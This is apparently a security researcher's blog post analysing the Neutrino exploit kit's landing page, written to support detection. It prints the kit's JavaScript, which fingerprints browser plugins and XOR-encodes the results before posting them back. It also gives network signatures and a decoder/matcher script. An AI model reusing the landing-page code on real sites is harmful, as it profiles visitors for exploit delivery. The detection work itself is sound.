I finally got the time to look into the landing page of Neutrino. Thanks to @malwaresigs and @kafeine for providing samples :)
What is this shiny new EK up to when it comes to the landing page? I have only seen clear text versions, so no deobfuscation needed.
Look here for a deeper analysis: "Neutrino Exploit Kit Analysis"
1. The landing
<!DOCTYPE HTML>
<html>
<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script type="text/javascript" src="scripts/js/plugin_detector.js"></script>
<script type="text/javascript">
$(document).ready(function() {
    qweqwewqe('515245e3aaa2cbaa2a00002b');
});

function qweqwewqe(hid) {
    var info = {
        plugins : {
            java: plg_all_vers('Java'),
            adobe_reader: plg_ver('AdobeReader'),
            flash: plg_ver('Flash'),
            quick_time: plg_ver('QuickTime'),
            real_player: plg_ver('RealPlayer'),
            shockwave: plg_ver('Shockwave'),
            silver_light: plg_ver('Silverlight'),
            vlc: plg_ver('VLC'),
            wmp: plg_ver('WMP')
        }
    }
    var pass = rnd_str(1+Math.floor(Math.random()*10));
    var obj = {};
    obj["h"+rnd_str(1+Math.floor(Math.random()*10))] = hid; // host id
    obj["p"+rnd_str(1+Math.floor(Math.random()*10))] = pass; // XOR pass
    obj["i"+rnd_str(1+Math.floor(Math.random()*10))] = kor(JSON.stringify(info), pass);
    $("body").load("c"+rnd_str(1+Math.floor(Math.random()*10)), obj);
}

function plg_all_vers(name) {
    var info = PluginDetect.getInfo(name);
    var vers = info.All_versions;
    if(!vers) return '';
    return info.All_versions.join(';')
}

function plg_ver(name) {
    var info = PluginDetect.getVersion(name);
    return info;
}

function rnd_str(len) {
    len++;
    var result = [];
    var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
    while (--len) {
        result.push(chars.charAt(Math.floor(Math.random() * chars.length)));
    }
    return result.join('');
}

function kor(input, pass) {
    var output = "";
    var i = 0;
    var pos = 0;
    for (i = 0; i < input.length; i++){
        pos = Math.floor(i%pass.length);
        output += String.fromCharCode(input.charCodeAt(i) ^ pass.charCodeAt(pos));
    }
    return output;
}

JSON.stringify = JSON.stringify || function (obj) {
    var t = typeof (obj);
    if (t != "object" || obj === null) {
        // simple data type
        if (t == "string") obj = '"'+obj+'"';
        return String(obj);
    } else {
        // recurse array or object
        var n, v, json = [], arr = (obj && obj.constructor == Array);
        for (n in obj) {
            v = obj[n];
            t = typeof(v);
            if (t == "string") v = '"'+v+'"';
            else if (t == "object" && v !== null) v = JSON.stringify(v);
            json.push((arr ? "" : '"' + n + '":') + String(v));
        }
        return (arr ? "[" : "{") + String(json) + (arr ? "]" : "}");
    }
};
</script>
</head>
<body>
</body>
</html>
The JavaScript calls the function qweqwewqe with an id (the comment in the script says "host id"), which, as we can see, is later used to fetch the JARs and the final payload (see @malwaresigs).
PluginDetect is used to enumerate the client's plugins and their versions: all installed Java versions, plus the version of Adobe Reader, Flash, QuickTime, RealPlayer, Shockwave, Silverlight, VLC and WMP.
Variables are built (jQuery's .load() issues a POST when it is handed a data object, which is why the request below is an XMLHttpRequest POST rather than a GET):
//xor password generation:
var pass = rnd_str(1+Math.floor(Math.random()*10));
//@malforsec random string [a-z0-9]{1,10}

//host id assigned:
obj["h"+rnd_str(1+Math.floor(Math.random()*10))] = hid; // host id
//@malforsec h + [a-z0-9]{1,10} = 515245e3aaa2cbaa2a00002b

//xor password assigned:
obj["p"+rnd_str(1+Math.floor(Math.random()*10))] = pass; // XOR pass
//@malforsec p + [a-z0-9]{1,10} = [a-z0-9]{1,10}

//plugin results xored; tostring and assigned:
obj["i"+rnd_str(1+Math.floor(Math.random()*10))] = kor(JSON.stringify(info), pass);
// @malforsec i + [a-z0-9]{1,10} = XOR info with pass

//jquery to build the post:
$("body").load("c"+rnd_str(1+Math.floor(Math.random()*10)), obj);
//@malforsec c + [a-z0-9]{1,10}, obj
2. Debugger output
Browser plugin detection
Plugin detection string with the XOR key and the XORed PluginDetect string
Post request built
3. Wireshark output
POST request captured with Wireshark
4. Signatures
These patterns may vary or have changed - look here
POST request to /c[a-z0-9]{1,10}
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
h[a-z0-9]{1,10}=[a-f0-9]{24}
i[a-z0-9]{1,10}=.*
p[a-z0-9]{1,10}=[a-z0-9]{1,10}$
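To tie section 1 and the signatures above together, here is an added example (my own code, not the kit's and not from the original post): it rebuilds the form body the landing POSTs, decodes a captured body back to the plugin report the way an analyst would, and runs the signature conditions over a parsed request. It assumes plain Node.js with no dependencies. The host id is the one from the landing page; the XOR password, the random parameter suffixes, the URI and the plugin versions in the sample are made up for this example.

```javascript
// Added example, not code from the original post or from the kit: rebuild the
// body the landing POSTs, decode a captured body back to the plugin report,
// and run the signature patterns over a request. Assumes plain Node.js.
// Host id is from the landing page; password, suffixes, URI and plugin
// versions below are made up.

// Same XOR the landing's kor() does: byte-wise, password repeated.
// XOR is its own inverse, so the one function both encodes and decodes.
function kor(input, pass) {
  let output = "";
  for (let i = 0; i < input.length; i++) {
    output += String.fromCharCode(input.charCodeAt(i) ^ pass.charCodeAt(i % pass.length));
  }
  return output;
}

// Form body as jQuery.param() builds it for $("body").load(url, obj):
// keys in insertion order, values percent-encoded, "%20" rewritten to "+".
// The XORed JSON is arbitrary bytes, so it comes out mostly %XX-escaped.
function buildPostBody(hid, pass, info, suffixes) {
  const obj = {};
  obj["h" + suffixes.h] = hid;                             // host id
  obj["p" + suffixes.p] = pass;                            // XOR pass
  obj["i" + suffixes.i] = kor(JSON.stringify(info), pass); // XORed plugin info
  return Object.entries(obj)
    .map(([k, v]) => encodeURIComponent(k) + "=" + encodeURIComponent(v))
    .join("&")
    .replace(/%20/g, "+");
}

// Analyst side: pick h/p/i out of a captured body by their one-letter prefix
// (the [a-z0-9]{1,10} suffix is noise), then XOR i with p and parse the JSON.
// Returns null when a parameter is missing, the percent-encoding is broken,
// or the XOR result is not JSON (wrong password, different kit version).
function decodePostBody(body) {
  const params = {};
  try {
    for (const pair of body.split("&")) {
      const eq = pair.indexOf("=");
      if (eq < 0) continue;
      const key = decodeURIComponent(pair.slice(0, eq));
      const val = decodeURIComponent(pair.slice(eq + 1).replace(/\+/g, "%20"));
      const m = /^([hpi])[a-z0-9]{1,10}$/.exec(key);
      if (m) params[m[1]] = val;
    }
    if (!params.h || !params.p || !params.i) return null;
    return { hostId: params.h, pass: params.p, info: JSON.parse(kor(params.i, params.p)) };
  } catch (e) {
    return null;
  }
}

// The signature section as checks over one parsed HTTP request. Every
// condition is reported separately so you can see which one did not fire.
function matchNeutrinoPost(req) {
  const hdr = (name) => req.headers[name] || "";
  const hit = {
    method: req.method === "POST",
    uri: /^\/c[a-z0-9]{1,10}$/.test(req.uri),
    contentType: /^application\/x-www-form-urlencoded/i.test(hdr("content-type")),
    xRequestedWith: hdr("x-requested-with") === "XMLHttpRequest",
    h: /(^|&)h[a-z0-9]{1,10}=[a-f0-9]{24}(&|$)/.test(req.body),
    i: /(^|&)i[a-z0-9]{1,10}=[^&]*/.test(req.body),
    p: /(^|&)p[a-z0-9]{1,10}=[a-z0-9]{1,10}(&|$)/.test(req.body),
  };
  hit.match = Object.values(hit).every(Boolean);
  return hit;
}

// Constructed sample (made up). PluginDetect reports versions comma-separated
// and null for plugins that are not installed; the landing joins all Java
// versions with ";".
const SAMPLE_INFO = {
  plugins: {
    java: "1,7,0,17;1,6,0,41",
    adobe_reader: "9,5,3,305",
    flash: "11,6,602,180",
    quick_time: null, real_player: null, shockwave: null,
    silver_light: "5,1,20125,0",
    vlc: null,
    wmp: "12,0,7601,17514"
  }
};
const SAMPLE_REQUEST = {
  method: "POST",
  uri: "/cxk29a",
  headers: {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
    "x-requested-with": "XMLHttpRequest"
  },
  body: buildPostBody("515245e3aaa2cbaa2a00002b", "q7zt", SAMPLE_INFO,
                      { h: "ab3", p: "9xk0", i: "m2" })
};

console.log(SAMPLE_REQUEST.body);
console.log(JSON.stringify(decodePostBody(SAMPLE_REQUEST.body), null, 2));
console.log(matchNeutrinoPost(SAMPLE_REQUEST));
```

Two things worth noting when turning this into IDS rules: the i value is XORed JSON that has been percent-encoded, so it can contain any %XX sequence and should be matched on its key prefix, not its content, and the p value is the key itself, sent in the clear, which is why a captured body can always be decoded without the landing page.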
That should pin it down pretty well :)
In addition we got some tips on how to get the different payloads out of the kit if we need to do that some day :)
Happy detecting Neutrino EK POST landing